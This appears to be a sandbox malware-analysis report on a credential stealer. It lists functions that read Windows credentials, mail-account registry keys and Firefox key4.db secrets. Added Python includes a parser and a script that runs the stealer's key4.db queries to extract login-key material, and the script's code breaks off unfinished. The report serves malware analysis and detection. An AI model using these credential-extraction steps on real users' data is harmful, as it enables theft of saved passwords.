• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memsetsprintf$FileWrite_mbscpystrlen
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 113626815-1670831295
• Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
• Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
• Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
• Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
Uniqueness
Uniqueness Score: -1.00%

APIs
• sprintf.MSVCRT ref: 004092EC
• LoadMenuA.USER32(?,?), ref: 004092FA
  • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
  • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
  • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
  • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
• DestroyMenu.USER32(00000000), ref: 00409318
• sprintf.MSVCRT ref: 0040935C
• CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
• memset.MSVCRT ref: 0040938D
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
• EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
• DestroyWindow.USER32(00000000), ref: 004093CD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
• Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
• Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
• Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
• Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
• Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
• Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
• Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
• GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
• Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
• Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
• Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
• memset.MSVCRT ref: 0040F1BF
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
• LocalFree.KERNEL32(?), ref: 0040F2A1
• RegCloseKey.ADVAPI32(?), ref: 0040F2AC
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
• RegCloseKey.ADVAPI32(?), ref: 0040F2D4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: Creds$ps:password
• API String ID: 551151806-1872227768
• Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
• Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
• Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
• Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcsstr.MSVCRT ref: 0040424C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
• _mbscpy.MSVCRT ref: 004042B7
• _mbscpy.MSVCRT ref: 004042CA
• strchr.MSVCRT ref: 004042D8
• strlen.MSVCRT ref: 004042EC
• sprintf.MSVCRT ref: 0040430D
• strchr.MSVCRT ref: 0040431E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
• Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
• Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
• Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
• Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
Uniqueness
Uniqueness Score: -1.00%

APIs
• _mbscpy.MSVCRT ref: 004094BA
• _mbscpy.MSVCRT ref: 004094CA
  • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
  • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
  • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
• EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
• EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
• _mbscpy.MSVCRT ref: 00409512
• memset.MSVCRT ref: 0040952E
• LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
  • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
• Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
• Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 714388716-318151290
                                                                                                                                                                                                                      • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                      • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                                        • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                                        • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                                        • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1416211542-0
                                                                                                                                                                                                                      • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                      • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                      • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                      • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                                        • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                                        • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                                        • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                      • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                      • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                      • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
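The two function summaries above with mail-related strings (the one whose String IDs are imap:// and mailbox:// URL templates, and the one that walks Software\Microsoft\Internet Account Manager\Accounts and the Outlook OMI Account Manager key with RegOpenKeyExA/RegEnumKeyExA) are the blocks an analyst pulls out of a report this long to confirm the "Tries to steal Mail credentials" signature. Added example, not part of the Joe Sandbox report or of the plugin's own code: a Python triage script that parses these IDA-plugin summary blocks into records and tags the functions whose strings reference mail-account storage. The indicator lists, tag names and regular expressions are the editor's own assumptions about the block layout shown on this page; the embedded sample text is two blocks copied from the section above with the snapshot, instruction and fuzzy-hash lines trimmed.

```python
"""Triage helper for Joe Sandbox IDA-plugin function summaries (added example, not
part of the report). Parses the APIs/Strings/Similarity blocks into records and tags
functions whose String IDs reference mail-account storage; tags are editor-chosen."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two blocks copied from the section above, hash/source lines trimmed.
SAMPLE = r"""
APIs
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
• memset.MSVCRT ref: 00402C8F
  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
• RegCloseKey.ADVAPI32(?), ref: 00402D91
Strings
Similarity
• API ID: Closememset$sprintf$EnumOpen
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
• Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
Uniqueness Score: -1.00%
"""

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE, optional (args), "ref: <addr>".
API_CALL = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD = re.compile(r"^\s*•\s*(?P<key>String ID|Opcode ID):\s*(?P<val>.*?)\s*$")

# Indicator lists are assumptions chosen for this example, matched case-insensitively.
MAIL_REGISTRY = (
    r"software\microsoft\internet account manager\accounts",
    r"software\microsoft\office\outlook\omi account manager\accounts",
)
MAIL_SCHEMES = ("imap://", "mailbox://", "pop3://", "smtp://")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    args: list[str]
    subcall_of: str | None  # callee address when the call was lifted from a subcall

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    indicators: set[str] = field(default_factory=set)

def split_blocks(text: str) -> list[list[str]]:
    """Each summary block ends at its 'Uniqueness Score' line."""
    blocks, cur = [], []
    for line in text.splitlines():
        cur.append(line)
        if line.strip().startswith("Uniqueness Score"):
            blocks.append(cur)
            cur = []
    if any(ln.strip() for ln in cur):  # trailing block that has no score line
        blocks.append(cur)
    return blocks

def classify(rec: FunctionRecord) -> set[str]:
    low = [s.lower() for s in rec.strings]
    tags = set()
    if any(k in s for s in low for k in MAIL_REGISTRY):
        tags.add("mail_account_registry")
    if any(s.startswith(MAIL_SCHEMES) for s in low):
        tags.add("mail_url_scheme")
    # Registry paths alone could be a lookup table; require the enumeration APIs too.
    if "mail_account_registry" in tags and {"RegOpenKeyExA", "RegEnumKeyExA"} <= {a.name for a in rec.apis}:
        tags.add("registry_enumeration")
    return tags

def parse_block(lines: list[str]) -> FunctionRecord:
    rec = FunctionRecord()
    for line in lines:
        if m := API_CALL.match(line):
            args = [a for a in (m["args"] or "").split(",") if a]
            rec.apis.append(ApiCall(m["name"], m["module"], m["ref"], args, m["sub"]))
        elif m := FIELD.match(line):  # headers and hash lines fall through untouched
            if m["key"] == "String ID":
                rec.strings = [s for s in m["val"].split("$") if s]
            else:
                rec.opcode_id = m["val"]
    rec.indicators = classify(rec)
    return rec

def triage(text: str) -> list[FunctionRecord]:
    return [parse_block(b) for b in split_blocks(text)]
```

Run `triage()` over the text of the whole "Joe Sandbox IDA Plugin" section rather than the sample to get one record per function; the Opcode ID is the stable key to deduplicate on, since the same function appears under several memory dumps with identical hashes. The registry_enumeration tag is deliberately stricter than a string match: the account-manager paths also occur in benign lookup tables, so the example only raises it when the same block shows RegOpenKeyExA and RegEnumKeyExA being called.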

APIs
• strchr.MSVCRT ref: 0040FA5C
• _mbscpy.MSVCRT ref: 0040FA6A
  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
  • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
• _mbscpy.MSVCRT ref: 0040FABA
• _mbscat.MSVCRT ref: 0040FAC5
• memset.MSVCRT ref: 0040FAA1
  • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
  • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
• memset.MSVCRT ref: 0040FAE9
• memcpy.MSVCRT ref: 0040FB04
• _mbscat.MSVCRT ref: 0040FB0F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 912701516-1821301763
• Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
• Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
• Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
• Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
Uniqueness
Uniqueness Score: -1.00%

APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                                      • C@, xrefs: 00406625
                                                                                                                                                                                                                      • key4.db, xrefs: 00406632
                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                                      • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                      • API String ID: 2950547843-1835927508
                                                                                                                                                                                                                      • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                      • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
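The two SQL statements and the key4.db file name in the function above are the Mozilla (Firefox / Thunderbird) credential-recovery routine that Remcos carries. key4.db is the profile's NSS key store: the metadata row with id = 'password' holds the global salt (item1) and the PBE-encrypted "password-check" blob (item2), and the nssPrivate row whose CKA_ID (a102) is f8000000000000000000000000000001 holds the wrapped 3DES key (a11) that protects logins.json. Those blobs plus the master password (often empty) are everything a decryptor needs, which is why the literal query strings make a good static indicator. The Python below is an added example, not code from the report or from the sample: it runs the same two queries read-only against a key4.db and returns what a stealer would obtain, so an analyst can point it at a copy of a victim's profile to see what was exposed. The CKA_ID constant comes from NSS behaviour rather than from this report, the sample database is a constructed fixture with dummy blobs, and the actual PBE decryption of the blobs is out of scope.

```python
"""Show what the stealer's two key4.db queries pull out of a Mozilla profile.

Added example for this report; not part of Joe Sandbox output or the sample.
"""
import os
import sqlite3
import tempfile
from typing import Optional

# The exact statements the dumped function carries (xrefs 0040668D and 0040677A).
Q_METADATA = "SELECT item1,item2 FROM metadata WHERE id = 'password'"
Q_NSSPRIVATE = "SELECT a11,a102 FROM nssPrivate"

# CKA_ID that NSS assigns to the 3DES key wrapping saved logins; a decryptor keeps
# the nssPrivate row whose a102 equals this. (NSS behaviour, not stated in the report.)
LOGIN_KEY_CKA_ID = bytes.fromhex("f8000000000000000000000000000001")


def harvest_key4(db_path: str) -> Optional[dict]:
    """Run the two stealer queries against a key4.db, opened read-only.

    Returns the material a decryptor needs (global salt, PBE 'password-check'
    blob, wrapped login key) or None when the file holds no NSS key material
    (missing tables or no 'password' row), e.g. a profile that never saved a login.
    """
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)
    try:
        try:
            row = conn.execute(Q_METADATA).fetchone()
            private_rows = list(conn.execute(Q_NSSPRIVATE))
        except sqlite3.OperationalError:  # "no such table": not a key store
            return None
        if row is None:
            return None
        global_salt, password_check = row
        wrapped = [bytes(a11) for a11, a102 in private_rows
                   if a102 == LOGIN_KEY_CKA_ID]
        return {
            "global_salt": bytes(global_salt),
            "password_check": bytes(password_check),
            "wrapped_login_key": wrapped[0] if wrapped else None,
            # other private keys in the store (client certs etc.) are not login material
            "other_private_keys": len(private_rows) - len(wrapped),
        }
    finally:
        conn.close()


def build_sample_key4(populate: bool = True) -> str:
    """Constructed fixture: write a key4.db-shaped SQLite file with dummy blobs
    to a temp file and return its path. Real files carry ASN.1-encoded blobs and
    over a hundred aN columns; only the columns the queries touch are modelled.
    With populate=False the file is an empty database (no tables at all)."""
    fd, path = tempfile.mkstemp(suffix="-key4.db")
    os.close(fd)
    conn = sqlite3.connect(path)
    if populate:
        conn.executescript(
            "CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);"
            "CREATE TABLE nssPrivate (id PRIMARY KEY, a0, a1, a2, a3, a11, a102);"
        )
        conn.execute("INSERT INTO metaData VALUES ('password', ?, ?)",
                     (b"\x01" * 20, b"\x30\x1cconstructed-password-check"))
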